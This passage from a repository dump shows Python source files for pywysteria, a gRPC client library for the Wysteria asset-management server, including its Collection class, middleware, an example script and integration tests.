management\nserver.\n\n\nFiles:\n------\n\n- client.py\n high level class that wraps a middleware connection & adds some helpful functions.\n- constants.py\n various constants used\n- errors.py\n contains various exceptions that can be raised\n- search.py\n simple class for building wysteria search params\n- utils.py\n simple utility functions for reading config files and other misc stuff\n\n\nModules\n-------\n\n - domain\n python wrappers around various wysteria native objects\n - middleware\n python implementations of the communication protocol for talking to the server\n\n\nExported\n--------\n\n Client\n Wysteria client wrapper class\n\n TlsConfig\n Simplified TLS config object that can be used to secure the middleware connection\n\n errors\n Error module that contains various exceptions that can be raised by the client\n\n default_client\n Sugar function to build & configure a client. 
Searches for a wysteria client config & falls\n back on using some default hardcoded settings if all else fails.\n\n from_config\n Construct & configure a client from a given config file.\n\n\"\"\"\nfrom wysteria.client import Client\nfrom wysteria import errors\nfrom wysteria.constants import FACET_COLLECTION\nfrom wysteria.constants import FACET_ITEM_TYPE\nfrom wysteria.constants import FACET_ITEM_VARIANT\nfrom wysteria.constants import FACET_LINK_TYPE\nfrom wysteria.constants import VALUE_LINK_TYPE_VERSION\nfrom wysteria.constants import VALUE_LINK_TYPE_ITEM\nfrom wysteria.utils import default_client\nfrom wysteria.utils import from_config\n\n\n__all__ = [\n \"Client\",\n \"errors\",\n \"default_client\",\n \"from_config\",\n \"FACET_COLLECTION\",\n \"FACET_ITEM_TYPE\",\n \"FACET_ITEM_VARIANT\",\n \"FACET_LINK_TYPE\",\n \"VALUE_LINK_TYPE_VERSION\",\n \"VALUE_LINK_TYPE_ITEM\",\n]\n" }, { "alpha_fraction": 0.5317717790603638, "alphanum_fraction": 0.532699465751648, "avg_line_length": 24.069766998291016, "blob_id": "f7cadc76cf0ac403e313af81e5185d04ce67b668", "content_id": "a09692f1eedde1ed1f206ee0526337a5fbd89849", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4312, "license_type": "permissive", "max_line_length": 90, "num_lines": 172, "path": "/wysteria/domain/collection.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\nfrom copy import copy\n\nimport wysteria.constants as consts\nfrom wysteria.domain.base import ChildWysObj\nfrom wysteria.domain.item import Item\nfrom wysteria.domain.query_desc import QueryDesc\n\n\nclass Collection(ChildWysObj):\n\n def __init__(self, conn, **kwargs):\n super().__init__(**kwargs)\n self.__conn = conn\n self._name = kwargs.get(\"name\")\n\n def _encode(self) -> dict:\n \"\"\"Return the dict representation of this object\n\n Returns:\n dict\n \"\"\"\n return {\n \"id\": self.id,\n \"uri\": self._uri,\n \"name\": self.name,\n \"parent\": self._parent,\n \"facets\": self.facets,\n }\n\n def __eq__(self, other):\n if not isinstance(other, Collection):\n raise NotImplementedError()\n\n return all([\n self.id == other.id,\n self.name == other.name,\n self.parent == other.parent,\n ])\n\n def _fetch_uri(self) -> str:\n \"\"\"Fetch uri from remote server.\n\n Returns:\n str\n \"\"\"\n result = self.__conn.find_collections([QueryDesc().id(self.id)], limit=1)\n if result:\n return result[0].uri\n return \"\"\n\n @property\n def name(self) -> str:\n \"\"\"Return the name of this collection\n\n Returns:\n str\n \"\"\"\n return self._name\n\n def delete(self):\n \"\"\"Delete this collection. 
\n \"\"\"\n return self.__conn.delete_collection(self.id)\n\n def create_collection(self, name: str, facets: dict=None):\n \"\"\"Create a sub collection of this collection\n\n Args:\n name (str): name of collection\n facets (dict): default facets to set on new collection\n\n Returns:\n domain.Collection\n \"\"\"\n cfacets = copy(facets)\n if not cfacets:\n cfacets = {}\n\n cfacets[consts.FACET_COLLECTION] = cfacets.get(consts.FACET_COLLECTION, self.name)\n\n c = Collection(self.__conn, name=name, parent=self.id, facets=cfacets)\n c._id = self.__conn.create_collection(c)\n return c\n\n def _update_facets(self, facets: dict):\n \"\"\"Performs the actual facet update via wysteria\n\n Args:\n facets: dict\n\n \"\"\"\n self.__conn.update_collection_facets(self.id, facets)\n\n def get_collections(self, name: str=None):\n \"\"\"Return child collections of this collection\n\n Args:\n name (str):\n\n Returns:\n []domain.Collection\n \"\"\"\n query = QueryDesc().parent(self.id)\n if name:\n query.name(name)\n return self.__conn.find_collections([query])\n\n def create_item(self, item_type: str, variant: str, facets: dict=None) -> Item:\n \"\"\"Create a child item with the given name & variant.\n\n Note a collection can only have one item with a given type & variant\n\n Args:\n item_type (str):\n variant (str):\n facets (dict):\n\n Returns:\n domain.Item\n \"\"\"\n cfacets = copy(facets)\n if not cfacets:\n cfacets = {}\n\n cfacets[consts.FACET_COLLECTION] = self.name\n\n i = Item(\n self.__conn,\n parent=self.id,\n itemtype=item_type,\n variant=variant,\n facets=cfacets,\n )\n i._id = self.__conn.create_item(i)\n return i\n\n def get_items(self, item_type: str=None, variant: str=None):\n \"\"\"Return all child items of this\n\n Args:\n item_type (str): only get item(s) of the given type\n variant (str): only get variant(s) of the given type\n\n Returns:\n []domain.Item\n \"\"\"\n query = QueryDesc().parent(self.id)\n\n if item_type:\n query.item_type(item_type)\n\n if variant:\n query.item_variant(variant)\n\n return self.__conn.find_items([query])\n\n def _get_parent(self):\n \"\"\"Return the parent Collection of this Collection\n\n Returns:\n domain.Collection or None\n \"\"\"\n results = self.__conn.find_collections(\n [QueryDesc().id(self.parent)],\n limit=1\n )\n if results:\n return results[0]\n return None\n" }, { "alpha_fraction": 0.5154350399971008, "alphanum_fraction": 0.5167461037635803, "avg_line_length": 22.370473861694336, "blob_id": "7d9c9f8ea7aa4cf528c2862cec0b24a3b7b222a0", "content_id": "5fe60f9ae023e592e9027f65821a7848f09f14fc", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16780, "license_type": "permissive", "max_line_length": 95, "num_lines": 718, "path": "/wysteria/middleware/impl_grpc.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import grpc\nimport json\n\nfrom google.protobuf.struct_pb2 import Struct\n\nfrom wysteria import domain\nfrom wysteria.middleware.abstract_middleware import WysteriaConnectionBase\nfrom wysteria.middleware.wgrpc import stubs\nfrom wysteria.middleware.wgrpc.wysteria import grpc_pb2 as pb\n\n\n_DEFAULT_URI = \":31000\" # default localhost, grpc port\n_DEFAULT_LIMIT = 500\n\n\ndef _get_secure_channel(url, tls):\n \"\"\"Return secure channel to server.\n\n Stolen from: https://www.programcreek.com/python/example/95418/grpc.secure_channel\n\n Args:\n url: host/port info of server\n tls: namedtuple of tls settings\n\n Returns:\n grpc.Channel\n\n 
Raises:\n IOError\n SSLError\n\n \"\"\"\n credentials = grpc.ssl_channel_credentials(open(tls.cert).read())\n\n # create channel using ssl credentials\n return grpc.secure_channel(\n url, credentials, options=(\n ('grpc.ssl_target_name_override', \"ABCD\",),\n )\n )\n\n\ndef _handle_rpc_error(func):\n def fn(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except grpc.RpcError as e:\n error_data = json.loads(e.debug_error_string())\n WysteriaConnectionBase.translate_server_exception(\n error_data.get(\"grpc_message\", str(e))\n )\n return fn\n\n\nclass GRPCMiddleware(WysteriaConnectionBase):\n \"\"\"Wysteria middleware client using gRPC to manage transport.\n\n \"\"\"\n def __init__(self, url, tls=None):\n self._url = url\n self._tls = tls\n self._channel = None\n self._stub = None\n\n def connect(self):\n \"\"\"Connect to the other end.\n\n \"\"\"\n if self._tls:\n if self._tls.enable:\n self._channel = grpc.secure_channel(self._url, self._tls)\n else:\n self._channel = grpc.insecure_channel(self._url)\n else:\n self._channel = grpc.insecure_channel(self._url)\n\n self._stub = stubs.WysteriaGrpcStub(self._channel)\n\n def close(self):\n self._channel.close()\n\n @_handle_rpc_error\n def _generic_find(self, query, limit, offset, finder, decoder):\n \"\"\"Perform a generic wysteria query.\n\n Args:\n query: query object to encode\n limit: limit to apply\n offset: offset to apply\n finder: function to call & pass query to\n decoder: function to decode result objects\n\n Returns:\n list\n\n \"\"\"\n reply = finder(\n pb.QueryDescs(\n Limit=limit,\n Offset=offset,\n all=[self._encode_query_desc(q) for q in query if q.is_valid]\n )\n )\n\n err = reply.error.Text\n if err:\n self.translate_server_exception(err)\n\n return [decoder(i) for i in reply.all]\n\n @_handle_rpc_error\n def _generic_create(self, obj, encoder, func):\n \"\"\"\n\n Args:\n obj: obj to encode\n encoder: function to do the encoding\n func: function to call (create func)\n\n Returns:\n str\n\n \"\"\"\n reply = func(encoder(obj))\n err = reply.error.Text\n if err:\n self.translate_server_exception(err)\n\n return reply.Id\n\n @_handle_rpc_error\n def _generic_update(self, oid, facets, func):\n \"\"\"\n\n Args:\n oid: Id of obj to update\n facets: Facets to set\n func: Update function to call\n\n \"\"\"\n result = func(pb.IdAndDict(Id=oid, Facets=facets))\n err = result.Text\n if err:\n self.translate_server_exception(err)\n\n @_handle_rpc_error\n def _generic_delete(self, oid, func):\n \"\"\"Call remote delete.\n\n Args:\n oid: id of obj to delete\n func: delete function\n\n \"\"\"\n result = func(pb.Id(Id=oid))\n\n err = result.Text\n if err:\n self.translate_server_exception(err)\n\n def find_collections(self, query, limit=_DEFAULT_LIMIT, offset=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Collection\n\n Raises:\n Exception on network / server error\n\n \"\"\"\n return self._generic_find(\n query,\n limit,\n offset,\n self._stub.FindCollections,\n self._decode_collection\n )\n\n def find_items(self, query, limit=_DEFAULT_LIMIT, offset=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n 
[]domain.Item\n\n Raises:\n Exception on network / server error\n \"\"\"\n return self._generic_find(\n query,\n limit,\n offset,\n self._stub.FindItems,\n self._decode_item\n )\n\n def find_versions(self, query, limit=_DEFAULT_LIMIT, offset=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Version\n\n Raises:\n Exception on network / server error\n \"\"\"\n return self._generic_find(\n query,\n limit,\n offset,\n self._stub.FindVersions,\n self._decode_version\n )\n\n def find_resources(self, query, limit=_DEFAULT_LIMIT, offset=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Resource\n\n Raises:\n Exception on network / server error\n \"\"\"\n return self._generic_find(\n query,\n limit,\n offset,\n self._stub.FindResources,\n self._decode_resource\n )\n\n def find_links(self, query, limit=_DEFAULT_LIMIT, offset=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Link\n\n Raises:\n Exception on network / server error\n \"\"\"\n return self._generic_find(\n query,\n limit,\n offset,\n self._stub.FindLinks,\n self._decode_link\n )\n\n def get_published_version(self, oid):\n \"\"\"Get the published version for the given Item id.\n\n Args:\n oid: id of parent Item\n\n Returns:\n Version\n\n \"\"\"\n result = self._stub.PublishedVersion(pb.Id(Id=oid))\n\n err = result.error.Text\n if err:\n self.translate_server_exception(err)\n\n return self._decode_version(result)\n\n def publish_version(self, oid):\n \"\"\"Publish the given version id.\n\n Args:\n oid: id of version to set as published\n\n \"\"\"\n result = self._stub.SetPublishedVersion(pb.Id(Id=oid))\n\n err = result.Text\n if err:\n self.translate_server_exception(err)\n\n def update_collection_facets(self, oid, facets):\n \"\"\"Update facets of a given Collection.\n\n Args:\n oid: id of object to update\n facets: dictionary of facets to set\n\n \"\"\"\n self._generic_update(oid, facets, self._stub.UpdateCollectionFacets)\n\n def update_item_facets(self, oid, facets):\n \"\"\"Update facets of a given Item.\n\n Args:\n oid: id of object to update\n facets: dictionary of facets to set\n\n \"\"\"\n self._generic_update(oid, facets, self._stub.UpdateItemFacets)\n\n def update_version_facets(self, oid, facets):\n \"\"\"Update facets of a given Version.\n\n Args:\n oid: id of object to update\n facets: dictionary of facets to set\n\n \"\"\"\n self._generic_update(oid, facets, self._stub.UpdateVersionFacets)\n\n def update_resource_facets(self, oid, facets):\n \"\"\"Update facets of a given Resource.\n\n Args:\n oid: id of object to update\n facets: dictionary of facets to set\n\n \"\"\"\n self._generic_update(oid, facets, self._stub.UpdateResourceFacets)\n\n def update_link_facets(self, oid, facets):\n \"\"\"Update facets of a given Link.\n\n Args:\n oid: id of object to update\n facets: dictionary of facets to set\n\n \"\"\"\n self._generic_update(oid, facets, self._stub.UpdateLinkFacets)\n\n def 
create_collection(self, collection):\n \"\"\"Create a Collection.\n\n Args:\n collection:\n\n Returns:\n str\n\n \"\"\"\n return self._generic_create(\n collection, self._encode_collection, self._stub.CreateCollection\n )\n\n def create_item(self, item):\n \"\"\"Create a Item.\n\n Args:\n item:\n\n Returns:\n str\n\n \"\"\"\n return self._generic_create(\n item, self._encode_item, self._stub.CreateItem\n )\n\n def create_version(self, version):\n \"\"\"Create a Version.\n\n Args:\n version:\n\n Returns:\n str, int\n\n \"\"\"\n reply = self._stub.CreateVersion(self._encode_version(version))\n\n err = reply.Text\n if err:\n self.translate_server_exception(err)\n\n return reply.Id, reply.Version\n\n def create_resource(self, resource):\n \"\"\"Create a Resource.\n\n Args:\n resource:\n\n Returns:\n str\n\n \"\"\"\n return self._generic_create(\n resource, self._encode_resource, self._stub.CreateResource\n )\n\n def create_link(self, link):\n \"\"\"Create a Link.\n\n Args:\n link:\n\n Returns:\n str\n\n \"\"\"\n return self._generic_create(\n link, self._encode_link, self._stub.CreateLink\n )\n\n def delete_collection(self, oid):\n \"\"\"Delete collection.\n\n Args:\n oid: id of obj to delete\n\n \"\"\"\n self._generic_delete(oid, self._stub.DeleteCollection)\n\n def delete_item(self, oid):\n \"\"\"Delete item.\n\n Args:\n oid: id of obj to delete\n\n \"\"\"\n self._generic_delete(oid, self._stub.DeleteItem)\n\n def delete_version(self, oid):\n \"\"\"Delete version.\n\n Args:\n oid: id of obj to delete\n\n \"\"\"\n self._generic_delete(oid, self._stub.DeleteVersion)\n\n def delete_resource(self, oid):\n \"\"\"Delete resource.\n\n Args:\n oid: id of obj to delete\n\n \"\"\"\n self._generic_delete(oid, self._stub.DeleteResource)\n\n # -- Encoders\n def _encode_query_desc(self, q: domain.QueryDesc):\n \"\"\"\n\n Args:\n q: domain.QueryDesc\n\n Returns:\n pb.QueryDesc\n \"\"\"\n return pb.QueryDesc(\n Parent=q._parent,\n Id=q._id,\n Uri=q._uri,\n VersionNumber=q._versionnumber,\n ItemType=q._itemtype,\n Variant=q._variant,\n Facets=self._encode_dict(q._facets),\n Name=q._name,\n ResourceType=q._resourcetype,\n Location=q._location,\n LinkSrc=q._linksrc,\n LinkDst=q._linkdst,\n )\n\n def _encode_collection(self, o: domain.Collection):\n \"\"\"\n\n Args:\n o: domain.Collection\n\n Returns:\n pb.Collection\n\n \"\"\"\n return pb.Collection(\n Parent=o.parent,\n Id=o.id,\n Uri=o._uri,\n Name=o.name,\n Facets=self._encode_dict(o.facets),\n )\n\n def _encode_item(self, o: domain.Item):\n \"\"\"\n\n Args:\n o: domain.Item\n\n Returns:\n pb.Item\n\n \"\"\"\n return pb.Item(\n Parent=o.parent,\n Id=o.id,\n Uri=o._uri,\n ItemType=o.item_type,\n Variant=o.variant,\n Facets=self._encode_dict(o.facets),\n )\n\n def _encode_version(self, o: domain.Version):\n \"\"\"\n\n Args:\n o: domain.version\n\n Returns:\n pb.version\n\n \"\"\"\n return pb.Version(\n Parent=o.parent,\n Id=o.id,\n Uri=o._uri,\n Number=o._number,\n Facets=self._encode_dict(o.facets),\n )\n\n def _encode_resource(self, o: domain.Resource):\n \"\"\"\n\n Args:\n o: domain.Resource\n\n Returns:\n pb.Resource\n\n \"\"\"\n return pb.Resource(\n Parent=o.parent,\n Id=o.id,\n Uri=o._uri,\n Name=o.name,\n ResourceType=o.resource_type,\n Location=o.location,\n Facets=self._encode_dict(o.facets),\n )\n\n def _encode_link(self, o: domain.Link):\n \"\"\"\n\n Args:\n o: domain.Link\n\n Returns:\n pb.Link\n\n \"\"\"\n return pb.Link(\n Id=o.id,\n Uri=o._uri,\n Src=o.source,\n Dst=o.destination,\n Name=o.name,\n Facets=self._encode_dict(o.facets),\n )\n\n 
@staticmethod\n def _encode_dict(data: dict):\n s = Struct()\n for key, value in data.items():\n s.update({str(key): str(value)})\n return s\n\n # -- Decoders\n def _decode_collection(self, o: pb.Collection):\n \"\"\"\n\n Args:\n o: pb.Collection\n\n Returns:\n domain.Collection\n\n \"\"\"\n return domain.Collection(\n self,\n id=o.Id,\n uri=o.Uri,\n name=o.Name,\n parent=o.Parent,\n facets=dict(o.Facets or {}),\n )\n\n def _decode_item(self, o: pb.Item):\n \"\"\"\n\n Args:\n o: pb.Item\n\n Returns:\n domain.Item\n\n \"\"\"\n return domain.Item(\n self,\n id=o.Id,\n uri=o.Uri,\n parent=o.Parent,\n facets=dict(o.Facets or {}),\n itemtype=o.ItemType,\n variant=o.Variant,\n )\n\n def _decode_version(self, o: pb.Version):\n \"\"\"\n\n Args:\n o: pb.Version\n\n Returns:\n domain.Version\n\n \"\"\"\n return domain.Version(\n self,\n id=o.Id,\n uri=o.Uri,\n parent=o.Parent,\n facets=dict(o.Facets or {}),\n number=o.Number,\n )\n\n def _decode_resource(self, o: pb.Resource):\n \"\"\"\n\n Args:\n o: pb.Resource\n\n Returns:\n domain.Resource\n\n \"\"\"\n return domain.Resource(\n self,\n parent=o.Parent,\n name=o.Name,\n resourcetype=o.ResourceType,\n id=o.Id,\n uri=o.Uri,\n facets=dict(o.Facets or {}),\n location=o.Location,\n )\n\n def _decode_link(self, o: pb.Link):\n \"\"\"\n\n Args:\n o: pb.Link\n\n Returns:\n domain.Link\n\n \"\"\"\n return domain.Link(\n self,\n name=o.Name,\n id=o.Id,\n uri=o.Uri,\n facets=dict(o.Facets or {}),\n src=o.Src,\n dst=o.Dst,\n )\n\n\nif __name__ == \"__main__\":\n from wysteria.utils import from_config\n\n def p(x):\n print(x.id, x.name, x.parent)\n\n c = from_config(\"/home/quintas/go/src/github.com/voidshard/pywysteria/wysteria-client.ini\")\n c.connect()\n\n col = c.get_collection(\"foo\")\n scol = c.get_collection(\"bar\")\n\n print(\"\\n\", \"all\")\n for i in c.search().find_collections():\n p(i)\n\n print(\"\\n\", \"children of v1\", col.id)\n for i in c.search().params(parent=col.id).find_collections():\n p(i)\n\n print(\"\\n\", \"children of v2\", col.id)\n children = col.get_collections()\n for i in children:\n p(i)\n\n print(\"\\n\", \"parent of\", scol.id)\n p(scol.get_parent())\n\n c.close()\n" }, { "alpha_fraction": 0.6129754185676575, "alphanum_fraction": 0.6174496412277222, "avg_line_length": 26.9375, "blob_id": "9c1c1fabd756b20adc30a5ea2da078477c969052", "content_id": "eb9e22be5d79708069810a189ab4304365ef462a", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 894, "license_type": "permissive", "max_line_length": 79, "num_lines": 32, "path": "/examples/05/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample05: Updating facets\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n search = client.search()\n\n # Wysteria will have added some facets auto-magically for us,\n # and it pays when searching for Versions to be as specific as possible\n search.params(facets={\n wysteria.FACET_COLLECTION: \"maps\",\n wysteria.FACET_ITEM_TYPE: \"2dmap\",\n wysteria.FACET_ITEM_VARIANT: \"forest\",\n })\n\n # grab the version we made earlier\n forest_version = search.find_versions()[0]\n\n # we can also add more facets after object creation so you can\n # search for custom fields. 
The idea is to keep these small, metadata,\n # tags and short strings.\n forest_version.update_facets(publisher=\"batman\")\n print(\"metadata added\")\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5408560037612915, "alphanum_fraction": 0.5481517314910889, "avg_line_length": 23.470237731933594, "blob_id": "9fcdf3e39d1b141cb5df97b72d607c774a003319", "content_id": "29aeb585d5df4d17ef575868e5f4a604d6444726", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4112, "license_type": "permissive", "max_line_length": 81, "num_lines": 168, "path": "/tests/integration/tests/domain/collection_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import pytest\nimport uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestCollection:\n \"\"\"Tests for the Collection class\"\"\"\n\n def _single_collection(self, id_):\n \"\"\"Get a collection by it's id\n \"\"\"\n search = self.client.search()\n search.params(id=id_)\n result = search.find_collections(limit=1)\n assert len(result) == 1\n return result[0]\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def test_update_facets(self):\n # arrange\n expected = {\"published_by\": \"batman\", \"foobar\": \"98172*(!@G*G&19832hOI&\"}\n col = self.client.create_collection(_rs())\n\n # act\n col.update_facets(**expected)\n remote = self._single_collection(col.id)\n\n # assert\n for k, v in expected.items():\n assert col.facets[k] == v\n assert remote.facets[k] == v\n\n def test_create_child_collection(self):\n # arrange\n parent = self.client.create_collection(_rs())\n\n # act\n child = parent.create_collection(_rs())\n rparent = child.get_parent()\n rchildren = parent.get_collections()\n\n # assert\n assert child.parent == parent.id\n assert rparent == parent\n assert rchildren == [child]\n\n def test_delete_collection(self):\n # arrange\n col = self.client.create_collection(_rs())\n\n s = self.client.search()\n s.params(id=col.id)\n\n # act\n col.delete()\n\n result = s.find_collections(limit=2)\n\n # assert\n assert not result\n\n def test_find_collection_by_facets(self):\n # arrange\n facets = {\n \"published_by\": \"zap\",\n }\n\n expected = [\n self.client.create_collection(_rs(), facets=facets),\n self.client.create_collection(_rs(), facets=facets),\n ]\n\n not_expected = [\n self.client.create_collection(_rs()),\n ]\n\n s = self.client.search()\n s.params(facets=facets)\n\n # act\n result = s.find_collections(limit=10)\n\n # assert\n assert len(result) == len(expected)\n for r in result:\n assert r in expected\n assert r not in not_expected\n\n def test_find_collection_by_name(self):\n # arrange\n name1 = _rs()\n name2 = _rs()\n\n col1 = self.client.create_collection(name1)\n self.client.create_collection(name2)\n\n s = self.client.search()\n s.params(name=name1)\n\n # act\n result = s.find_collections(limit=2)\n\n # assert\n assert len(result) == 1\n assert result[0] == col1\n\n def test_find_collection_by_id(self):\n # arrange\n name = _rs()\n col = self.client.create_collection(name)\n s = self.client.search()\n s.params(id=col.id)\n\n # act\n result = s.find_collections(limit=2)\n\n # assert\n assert len(result) == 1\n assert result[0] == col\n\n def test_create_collection_raises_on_duplicate(self):\n 
# arrange\n name = _rs()\n self.client.create_collection(name)\n\n # act & assert\n with pytest.raises(wysteria.errors.AlreadyExistsError):\n self.client.create_collection(name)\n\n def test_create_collection_creates_remote_collection(self):\n # arrange\n name = _rs()\n facets = {\"foo\": \"bar\"}\n\n # act\n lresult = self.client.create_collection(name, facets=facets)\n rresult = self._single_collection(lresult.id)\n\n # assert\n for r in [lresult, rresult]:\n assert r\n assert r.name == name\n assert r.id\n assert r.uri\n assert r.facets\n\n assert rresult == lresult\n for k, v in facets.items():\n assert rresult.facets[k] == v\n assert lresult.facets[k] == v\n\n" }, { "alpha_fraction": 0.5115140676498413, "alphanum_fraction": 0.5229374170303345, "avg_line_length": 24.41474723815918, "blob_id": "b25591453dfca35fb3699c78bd9952da7a6f5e45", "content_id": "dd5807e520b7e1bde31181e5df57ef08afe094df", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5515, "license_type": "permissive", "max_line_length": 72, "num_lines": 217, "path": "/tests/integration/tests/domain/link_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import pytest\nimport uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestLink:\n \"\"\"Tests for the Link class\"\"\"\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n cls.collection = cls.client.create_collection(_rs())\n cls.item1 = cls.collection.create_item(_rs(), _rs())\n cls.item2 = cls.collection.create_item(_rs(), _rs())\n cls.version1 = cls.item1.create_version()\n cls.version2 = cls.item2.create_version()\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def _single_link(self, id_):\n \"\"\"Return a single link by Id\n\n Args:\n id_:\n\n Returns:\n Link\n \"\"\"\n s = self.client.search()\n s.params(id=id_)\n results = s.find_links(limit=1)\n assert results\n return results[0]\n\n def test_links_are_deleted_when_version_is_deleted(self):\n # arrange\n v1 = self.item1.create_version()\n v2 = self.item2.create_version()\n\n l1 = v1.link_to(_rs(), v2)\n l2 = v2.link_to(_rs(), v1)\n\n s = self.client.search()\n s.params(id=l1.id)\n s.params(id=l2.id)\n\n # act\n v1.delete()\n\n results = s.find_links(limit=3)\n\n # assert\n assert not results\n\n def test_links_are_deleted_when_item_is_deleted(self):\n # arrange\n v1 = self.collection.create_item(_rs(), _rs())\n v2 = self.collection.create_item(_rs(), _rs())\n\n l1 = v1.link_to(_rs(), v2)\n l2 = v2.link_to(_rs(), v1)\n\n s = self.client.search()\n s.params(id=l1.id)\n s.params(id=l2.id)\n\n # act\n v1.delete()\n\n results = s.find_links(limit=3)\n\n # assert\n assert not results\n\n def test_raises_on_duplicate_item_link(self):\n # arrange\n name = _rs()\n self.item1.link_to(name, self.item2)\n\n # act & assert\n with pytest.raises(wysteria.errors.AlreadyExistsError):\n self.item1.link_to(name, self.item2)\n\n def test_raises_on_duplicate_version_link(self):\n # arrange\n name = _rs()\n self.version1.link_to(name, self.version2)\n\n # act & assert\n with pytest.raises(wysteria.errors.AlreadyExistsError):\n self.version1.link_to(name, self.version2)\n\n def test_raises_on_self_link_item(self):\n # arrange\n name = _rs()\n\n # act & assert\n with pytest.raises(wysteria.errors.IllegalOperationError):\n self.item1.link_to(name, 
self.item1)\n\n def test_raises_on_self_link_version(self):\n # arrange\n name = _rs()\n\n # act & assert\n with pytest.raises(wysteria.errors.IllegalOperationError):\n self.version1.link_to(name, self.version1)\n\n def test_raises_on_cross_object_link(self):\n # arrange\n name = _rs()\n\n # act & assert\n with pytest.raises(ValueError):\n self.version1.link_to(name, self.item1)\n\n with pytest.raises(ValueError):\n self.item1.link_to(name, self.version1)\n\n def test_update_facets_version_link(self):\n # arrange\n name = _rs()\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n }\n lnk = self.version1.link_to(name, self.version2)\n\n # act\n lnk.update_facets(**facets)\n remote = self._single_link(lnk.id)\n\n # assert\n for k, v in facets.items():\n assert lnk.facets[k] == v\n assert remote.facets[k] == v\n\n def test_update_facets_item_link(self):\n # arrange\n name = _rs()\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n }\n lnk = self.item1.link_to(name, self.item2)\n\n # act\n lnk.update_facets(**facets)\n remote = self._single_link(lnk.id)\n\n # assert\n for k, v in facets.items():\n assert lnk.facets[k] == v\n assert remote.facets[k] == v\n\n def test_create_version_link(self):\n # arrange\n name = _rs()\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n }\n\n # act\n lnk = self.version1.link_to(name, self.version2, facets=facets)\n remote = self._single_link(lnk.id)\n\n # assert\n assert lnk\n assert remote\n assert lnk == remote\n assert lnk.destination == remote.destination == self.version2.id\n assert lnk.source == remote.source == self.version1.id\n for k, v in facets.items():\n assert lnk.facets[k] == v\n assert remote.facets[k] == v\n\n def test_create_item_link(self):\n # arrange\n name = _rs()\n facets = {\n _rs(): _rs(),\n _rs(): _rs(),\n _rs(): _rs(),\n }\n\n # act\n lnk = self.item1.link_to(name, self.item2, facets=facets)\n remote = self._single_link(lnk.id)\n\n # assert\n assert lnk\n assert remote\n assert lnk == remote\n assert lnk.destination == remote.destination == self.item2.id\n assert lnk.source == remote.source == self.item1.id\n assert lnk.id\n assert lnk.uri\n for k, v in facets.items():\n assert lnk.facets[k] == v\n assert remote.facets[k] == v\n" }, { "alpha_fraction": 0.5771689414978027, "alphanum_fraction": 0.5780822038650513, "avg_line_length": 20.899999618530273, "blob_id": "e3d24ff7bc74f1abd5854c891caaa99783ba2e7a", "content_id": "9baa1a9ba303b1ab5553c4c51f6b0be205b2bb21", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1095, "license_type": "permissive", "max_line_length": 56, "num_lines": 50, "path": "/tests/integration/tests/client_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestClient:\n \"\"\"Tests for the client class\"\"\"\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def test_get_item_returns_desired_item(self):\n # arrange\n col = self.client.create_collection(_rs())\n item = col.create_item(_rs(), _rs())\n col.create_item(_rs(), _rs())\n\n # act\n result = self.client.get_item(item.id)\n\n # assert\n assert result == item\n\n def test_get_collection_returns_by_name_or_id(self):\n # arrange\n col = 
